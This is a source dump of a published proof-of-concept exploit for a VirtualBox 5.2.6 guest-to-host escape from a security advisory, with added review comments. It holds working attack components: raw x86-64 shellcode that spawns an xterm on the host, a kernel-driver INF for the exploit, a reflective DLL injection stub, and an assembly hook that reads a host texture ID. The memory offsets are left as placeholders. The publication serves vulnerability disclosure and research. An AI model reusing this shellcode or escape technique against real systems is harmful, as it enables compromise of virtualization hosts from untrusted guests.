    GLboolean retval = cr_server.head_spu->dispatch_table.IsQueryARB(id);

    crServerReturnValue(&retval, sizeof(retval));
    return retval; /* WILL PROBABLY BE IGNORED */
}
/*
 * Server-side glRenderMode: forward to the head SPU and ship the GLint result
 * back to the client via crServerReturnValue; the C return value is kept for
 * the dispatch table only.
 */
GLint SERVER_DISPATCH_APIENTRY crServerDispatchRenderMode(GLenum mode)
{
    GLint retval = cr_server.head_spu->dispatch_table.RenderMode(mode);

    crServerReturnValue(&retval, sizeof(retval));
    return retval; /* WILL PROBABLY BE IGNORED */
}
/*
 * Server-side glTestFenceNV: forward to the head SPU and ship the GLboolean
 * back to the client via crServerReturnValue; the C return value is kept for
 * the dispatch table only.
 */
GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchTestFenceNV(GLuint fence)
{
    GLboolean retval = cr_server.head_spu->dispatch_table.TestFenceNV(fence);

    crServerReturnValue(&retval, sizeof(retval));
    return retval; /* WILL PROBABLY BE IGNORED */
}
94 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/state_line_gen.c:
--------------------------------------------------------------------------------
1 | /* This code is AUTOGENERATED!!! */
2 |
3 | #include "state.h"
4 | #include "state_internals.h"
5 |
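/*
 * Bring fromCtx's line state up to date with toCtx's.
 *
 * For each piece of line state whose dirty bit in b is set for bitID, the
 * matching GL call is issued through diff_api when the two contexts differ
 * and the new value is mirrored into fromCtx.  Every dirty bit that was
 * examined is cleared for bitID afterwards, using the complemented copy
 * nbitID.  The stipple parameters are only diffed when stippling is enabled
 * in the target context.
 *
 * NOTE(review): the listing this was taken from lost the loop that fills
 * nbitID (the text between "j" and "b->" was eaten as an HTML tag); it is
 * restored here from the nbitID declaration and its use in CLEARDIRTY.  The
 * unused local "i" from the generated source was dropped.
 *
 * NOTE(review): able[] has two entries and is indexed with to->lineSmooth /
 * to->lineStipple; if those fields can ever hold a value other than 0 or 1
 * the lookup reads past the table - confirm how they are set.
 */
void crStateLineDiff(CRLineBits *b, CRbitvalue *bitID,
        CRContext *fromCtx, CRContext *toCtx)
{
    CRLineState *from = &(fromCtx->line);
    CRLineState *to = &(toCtx->line);
    unsigned int j;
    CRbitvalue nbitID[CR_MAX_BITARRAY];

    /* complement of bitID, handed to CLEARDIRTY below */
    for (j = 0; j < CR_MAX_BITARRAY; j++)
        nbitID[j] = ~bitID[j];

    if (CHECKDIRTY(b->enable, bitID))
    {
        glAble able[2];
        able[0] = diff_api.Disable;
        able[1] = diff_api.Enable;
        if (from->lineSmooth != to->lineSmooth)
        {
            able[to->lineSmooth](GL_LINE_SMOOTH);
            from->lineSmooth = to->lineSmooth;
        }
        if (from->lineStipple != to->lineStipple)
        {
            able[to->lineStipple](GL_LINE_STIPPLE);
            from->lineStipple = to->lineStipple;
        }
        CLEARDIRTY(b->enable, nbitID);
    }
    if (CHECKDIRTY(b->width, bitID))
    {
        if (from->width != to->width)
        {
            diff_api.LineWidth(to->width);
            from->width = to->width;
        }
        CLEARDIRTY(b->width, nbitID);
    }
    if (to->lineStipple)
    {
        if (CHECKDIRTY(b->stipple, bitID))
        {
            if (from->repeat != to->repeat ||
                from->pattern != to->pattern)
            {
                diff_api.LineStipple(to->repeat,
                        to->pattern);
                from->repeat = to->repeat;
                from->pattern = to->pattern;
            }
            CLEARDIRTY(b->stipple, nbitID);
        }
    } /*lineStipple*/
    CLEARDIRTY(b->dirty, nbitID);
}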
59 |
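/*
 * Switch the GL line state from fromCtx to toCtx without updating fromCtx.
 *
 * Like crStateLineDiff, each dirty piece of line state is compared between
 * the contexts and the GL call issued through diff_api when they differ, but
 * instead of mirroring the value into fromCtx the corresponding dirty bits
 * (and the summary bit b->dirty) are set for all contexts with FILLDIRTY, so
 * the state is re-examined on the next diff.  The examined bits are then
 * cleared for bitID via the complemented copy nbitID.  Unlike the diff, the
 * stipple parameters are compared regardless of whether stippling is enabled.
 *
 * NOTE(review): the listing this was taken from lost the loop that fills
 * nbitID (the text between "j" and "b->" was eaten as an HTML tag); it is
 * restored here from the nbitID declaration and its use in CLEARDIRTY.  The
 * unused local "i" from the generated source was dropped.
 *
 * NOTE(review): able[] has two entries and is indexed with to->lineSmooth /
 * to->lineStipple; if those fields can ever hold a value other than 0 or 1
 * the lookup reads past the table - confirm how they are set.
 */
void crStateLineSwitch(CRLineBits *b, CRbitvalue *bitID,
        CRContext *fromCtx, CRContext *toCtx)
{
    CRLineState *from = &(fromCtx->line);
    CRLineState *to = &(toCtx->line);
    unsigned int j;
    CRbitvalue nbitID[CR_MAX_BITARRAY];

    /* complement of bitID, handed to CLEARDIRTY below */
    for (j = 0; j < CR_MAX_BITARRAY; j++)
        nbitID[j] = ~bitID[j];

    if (CHECKDIRTY(b->enable, bitID))
    {
        glAble able[2];
        able[0] = diff_api.Disable;
        able[1] = diff_api.Enable;
        if (from->lineSmooth != to->lineSmooth)
        {
            able[to->lineSmooth](GL_LINE_SMOOTH);
            FILLDIRTY(b->enable);
            FILLDIRTY(b->dirty);
        }
        if (from->lineStipple != to->lineStipple)
        {
            able[to->lineStipple](GL_LINE_STIPPLE);
            FILLDIRTY(b->enable);
            FILLDIRTY(b->dirty);
        }
        CLEARDIRTY(b->enable, nbitID);
    }
    if (CHECKDIRTY(b->width, bitID))
    {
        if (from->width != to->width)
        {
            diff_api.LineWidth(to->width);
            FILLDIRTY(b->width);
            FILLDIRTY(b->dirty);
        }
        CLEARDIRTY(b->width, nbitID);
    }
    if (CHECKDIRTY(b->stipple, bitID))
    {
        if (from->repeat != to->repeat ||
            from->pattern != to->pattern)
        {
            diff_api.LineStipple(to->repeat,
                    to->pattern);
            FILLDIRTY(b->stipple);
            FILLDIRTY(b->dirty);
        }
        CLEARDIRTY(b->stipple, nbitID);
    }
    CLEARDIRTY(b->dirty, nbitID);
}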
113 |
114 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/_Constants.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | /******************************************************************************
4 | * Exploit's constants - if something does not work, consider reviewing them
5 | ******************************************************************************/
6 |
/* Removed for the sake of PoC: the build-specific offsets below are
 * placeholders, so this translation unit intentionally does not compile as
 * published. */
ULONGLONG OffsetFromOglToLeakedAddr = ???; // VBoxSharedCrOpenGL.so
ULONGLONG OffsetFromVboxddToLeakedAddr = ???; // VBoxDD.so
ULONGLONG OffsetFromOglToVramPtr = ???; // g_pvVRamBase
ULONGLONG OffsetFromVboxddToRopGadget = ???;

/* Raw x86-64 payload followed by the NUL-padded string data it references;
 * the per-line comments are the disassembly.  Detection note: the byte
 * sequence and the embedded path / DISPLAY strings are stable static
 * indicators of this PoC. */
UCHAR gShellcode[] =
"\x48\xC7\xC0\x3A\x00\x00\x00" // mov rax, 00000003A
"\x0F\x05" // syscall
"\x48\x85\xC0" // test rax, rax
"\x75\x3A" // jnz 000000048
"\x48\x8D\x35\x4E\x00\x00\x00" // lea rsi, [000000063]
"\x48\x89\x35\x6B\x00\x00\x00" // mov [000000087], rsi
"\x48\x8D\x35\x57\x00\x00\x00" // lea rsi, [00000007A]
"\x48\x89\x35\x6D\x00\x00\x00" // mov [000000097], rsi
"\x48\x8D\x3D\x32\x00\x00\x00" // lea rdi, [000000063]
"\x48\x8D\x35\x4F\x00\x00\x00" // lea rsi, [000000087]
"\x48\x8D\x15\x58\x00\x00\x00" // lea rdx, [000000097]
"\x48\xC7\xC0\x3B\x00\x00\x00" // mov rax, 00000003B
"\x0F\x05" // syscall
"\x48\x8B\xBC\x24\xB8\x01\x00\x00" // mov rdi, [rsp][0000002D8]
"\x48\x81\xC5\x80\x03\x00\x00" // add rbp, 0000002D0
"\x48\x81\xC4\xC0\x01\x00\x00" // add rsp, 0000002E0
"\x48\x31\xC0" // xor rax, rax
"\x57" // push rdi
"\xC3" // retn
"\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x78\x74\x65\x72\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00" // "/usr/bin/xterm"
"\x44\x49\x53\x50\x4C\x41\x59\x3D\x3A\x30\x2E\x30\x00" // "DISPLAY=:0.0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // argv[]
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; // envp[]

/* sizeof of a char array initialised from a string literal includes the
 * implicit terminating NUL, so this is one byte more than the bytes listed. */
SIZE_T gShellcodeSize = sizeof(gShellcode);
39 |
40 | /******************************************************************************
41 | * End of exploit's constants
42 | ******************************************************************************/
43 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/product-generated.h:
--------------------------------------------------------------------------------
#ifndef ___product_generated_h___
#define ___product_generated_h___

/* Product identity strings of the VirtualBox build this PoC was compiled
 * against (generated header; an OSE build, copyright year 2018). */
#define VBOX_VENDOR "Oracle Corporation"
#define VBOX_VENDOR_SHORT "Oracle"
#define VBOX_PRODUCT "Oracle VM VirtualBox"
#define VBOX_BUILD_PUBLISHER "_OSE"
#define VBOX_C_YEAR "2018"

#endif
11 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/version-generated.h:
--------------------------------------------------------------------------------
#ifndef ___version_generated_h___
#define ___version_generated_h___

/* Version identity the PoC was built against: VirtualBox 5.2.6, OSE build,
 * API level 5_2 (generated header).  Useful when checking which release the
 * offsets elsewhere in the project were derived from. */
#define VBOX_VERSION_MAJOR 5
#define VBOX_VERSION_MINOR 2
#define VBOX_VERSION_BUILD 6
#define VBOX_VERSION_STRING_RAW "5.2.6"
#define VBOX_VERSION_STRING "5.2.6_OSE"
#define VBOX_API_VERSION_STRING "5_2"

/* Free-form description supplied by whoever produced this build. */
#define VBOX_PRIVATE_BUILD_DESC "Private build by admin"

#endif
14 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.inf:
--------------------------------------------------------------------------------
1 | ;
2 | ; vrdpexploit.inf
3 | ;
4 |
5 | [Version]
6 | Signature="$WINDOWS NT$"
7 | Class=Sample ; TODO: edit Class
8 | ClassGuid={78A1C341-4539-11d3-B88D-00C04FAD5171} ; TODO: edit ClassGuid
9 | Provider=%ManufacturerName%
10 | CatalogFile=vrdpexploit.cat
11 | DriverVer= ; TODO: set DriverVer in stampinf property pages
12 |
13 | [DestinationDirs]
14 | DefaultDestDir = 12
15 | vrdpexploit_Device_CoInstaller_CopyFiles = 11
16 |
17 | ; ================= Class section =====================
18 |
19 | [ClassInstall32]
20 | Addreg=SampleClassReg
21 |
22 | [SampleClassReg]
23 | HKR,,,0,%ClassName%
24 | HKR,,Icon,,-5
25 |
26 | [SourceDisksNames]
27 | 1 = %DiskName%,,,""
28 |
29 | [SourceDisksFiles]
30 | vrdpexploit.sys = 1,,
31 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames
32 |
33 | ;*****************************************
34 | ; Install Section
35 | ;*****************************************
36 |
37 | [Manufacturer]
38 | %ManufacturerName%=Standard,NT$ARCH$
39 |
40 | [Standard.NT$ARCH$]
41 | %vrdpexploit.DeviceDesc%=vrdpexploit_Device, Root\vrdpexploit ; TODO: edit hw-id
42 |
43 | [vrdpexploit_Device.NT]
44 | CopyFiles=Drivers_Dir
45 |
46 | [Drivers_Dir]
47 | vrdpexploit.sys
48 |
49 | ;-------------- Service installation
50 | [vrdpexploit_Device.NT.Services]
51 | AddService = vrdpexploit,%SPSVCINST_ASSOCSERVICE%, vrdpexploit_Service_Inst
52 |
53 | ; -------------- vrdpexploit driver install sections
54 | [vrdpexploit_Service_Inst]
55 | DisplayName = %vrdpexploit.SVCDESC%
56 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER
57 | StartType = 3 ; SERVICE_DEMAND_START
58 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL
59 | ServiceBinary = %12%\vrdpexploit.sys
60 |
61 | ;
62 | ;--- vrdpexploit_Device Coinstaller installation ------
63 | ;
64 |
65 | [vrdpexploit_Device.NT.CoInstallers]
66 | AddReg=vrdpexploit_Device_CoInstaller_AddReg
67 | CopyFiles=vrdpexploit_Device_CoInstaller_CopyFiles
68 |
69 | [vrdpexploit_Device_CoInstaller_AddReg]
70 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller"
71 |
72 | [vrdpexploit_Device_CoInstaller_CopyFiles]
73 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll
74 |
75 | [vrdpexploit_Device.NT.Wdf]
76 | KmdfService = vrdpexploit, vrdpexploit_wdfsect
77 | [vrdpexploit_wdfsect]
78 | KmdfLibraryVersion = $KMDFVERSION$
79 |
80 | [Strings]
81 | SPSVCINST_ASSOCSERVICE= 0x00000002
82 | ManufacturerName="" ;TODO: Replace with your manufacturer name
83 | ClassName="Samples" ; TODO: edit ClassName
84 | DiskName = "vrdpexploit Installation Disk"
85 | vrdpexploit.DeviceDesc = "vrdpexploit Device"
86 | vrdpexploit.SVCDESC = "vrdpexploit Service"
87 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDll.c:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // This is a stub for the actual functionality of the DLL.
3 | //===============================================================================================//
4 | #include "ReflectiveLoader.h"
5 |
6 | // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
7 | // defined in the project properties (Properties->C++->Preprocessor) so that we can specify our own
8 | // DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
9 |
10 | // You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)
11 | extern HINSTANCE hAppInstance;
12 | extern VOID HijackHostId(PVOID launcherProcessMemory);
13 | //===============================================================================================//
// Custom DllMain of the reflectively loaded DLL (see the REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// note above).  Always reports success.
//   DLL_QUERY_HMODULE  - the loader's private reason code (6, ReflectiveDllInjection.h): hand the
//                        pseudo HINSTANCE back through lpReserved when a slot was supplied.
//   DLL_PROCESS_ATTACH - record the instance and run HijackHostId with lpReserved.  The extern
//                        above names that parameter launcherProcessMemory, so lpReserved presumably
//                        carries a launcher-supplied pointer rather than the usual loader value -
//                        confirm against the launcher.
//   other reasons      - no-op.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;   // never changed below
switch (dwReason)
{
case DLL_QUERY_HMODULE:
if (lpReserved != NULL)
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
//MessageBoxA(NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK);
HijackHostId(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDllInjection.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
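#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>

// we declare some common stuff in here...

// Private dwReason value the reflective loader passes to DllMain; not a Windows constant.
#define DLL_QUERY_HMODULE 6

// Read-through helpers: treat an address as a pointer to a value of the given width.
// Both the argument and the whole expression are parenthesised, so DEREF_32(p) + 1 adds to the
// loaded value and `DEREF(p) = x` still assigns through the pointer.
#define DEREF( name )    (*(UINT_PTR *)(name))
#define DEREF_64( name ) (*(DWORD64 *)(name))
#define DEREF_32( name ) (*(DWORD *)(name))
#define DEREF_16( name ) (*(WORD *)(name))
#define DEREF_8( name )  (*(BYTE *)(name))

// Signatures of the exported loader entry and of a DllMain, for calling through raw addresses.
typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID);
typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);

#define DLLEXPORT __declspec( dllexport )

//===============================================================================================//
#endif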
52 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/Shellcode.asm:
--------------------------------------------------------------------------------
1 | PUBLIC Shellcode
2 |
3 | EXTERN gHostId: DWORD
4 | EXTERN RestoreBytes: PROC
5 |
6 | .CODE
7 |
Shellcode PROC

; Hook body reached through the patch: preserve every general-purpose
; register, copy one 32-bit value out of the hooked function's frame into
; gHostId, undo the patch (RestoreBytes) so this runs only once, then
; restore the registers and return to the patched code.

; We should preserve all the registers because it's not known
; which of them will be used in RestoreBytes()
push rax
push rbx
push rcx
push rdx
push rsi
push rdi
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15

; IDirect3DSurface9* pSrcSurfIf = [rsp + 0260h]
; We add 8 because the shellcode is call'ed by the patch
; We also add 112 to account for all the pushes (8 * 14)
mov rax, qword ptr [rsp + 0260h + 08h + 070h];

; wined3d_surface* surface = ((d3d9_surface*)pSrcSurfIf)->wined3d_surface
mov rax, qword ptr [rax + 010h]

; uint32_t hostId = surface->texture_name
mov eax, dword ptr [rax + 0F4h]

; Save Host ID
mov dword ptr [gHostId], eax

; Replace the patch with original bytes so the shellcode will not be called anymore
call RestoreBytes

pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax

ret

Shellcode ENDP
62 |
63 | END
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | Source Files
29 |
30 |
31 | Source Files
32 |
33 |
34 |
35 |
36 | Header Files
37 |
38 |
39 | Header Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27428.2005
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit_launcher", "vrdpexploit_launcher\vrdpexploit_launcher.vcxproj", "{BE8BC74D-5981-4C66-8332-0C79ACE67A15}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hostid_hijacker", "hostid_hijacker\hostid_hijacker.vcxproj", "{0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.ActiveCfg = Debug|x64
19 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.Build.0 = Debug|x64
20 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.ActiveCfg = Debug|Win32
21 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.Build.0 = Debug|Win32
22 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.ActiveCfg = Release|x64
23 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.Build.0 = Release|x64
24 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.ActiveCfg = Release|Win32
25 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.Build.0 = Release|Win32
26 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.ActiveCfg = Debug|x64
27 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.Build.0 = Debug|x64
28 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.ActiveCfg = Debug|Win32
29 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.Build.0 = Debug|Win32
30 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.ActiveCfg = Release|x64
31 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.Build.0 = Release|x64
32 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.ActiveCfg = Release|Win32
33 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.Build.0 = Release|Win32
34 | EndGlobalSection
35 | GlobalSection(SolutionProperties) = preSolution
36 | HideSolutionNode = FALSE
37 | EndGlobalSection
38 | GlobalSection(ExtensibilityGlobals) = postSolution
39 | SolutionGuid = {6212740A-BF6E-48E0-9BD4-FC50CE875A0E}
40 | EndGlobalSection
41 | EndGlobal
42 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/GetProcAddressR.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
30 | //===============================================================================================//
31 | #include "ReflectiveDLLInjection.h"
32 |
33 | FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName);
34 | //===============================================================================================//
35 | #endif
36 | //===============================================================================================//
37 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/LoadLibraryR.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
30 | //===============================================================================================//
31 | #include "ReflectiveDLLInjection.h"
32 |
33 | DWORD GetReflectiveLoaderOffset(VOID * lpReflectiveDllBuffer);
34 |
35 | HMODULE WINAPI LoadLibraryR(LPVOID lpBuffer, DWORD dwLength);
36 |
37 | HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter);
38 |
39 | //===============================================================================================//
40 | #endif
41 | //===============================================================================================//
42 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Process.c:
--------------------------------------------------------------------------------
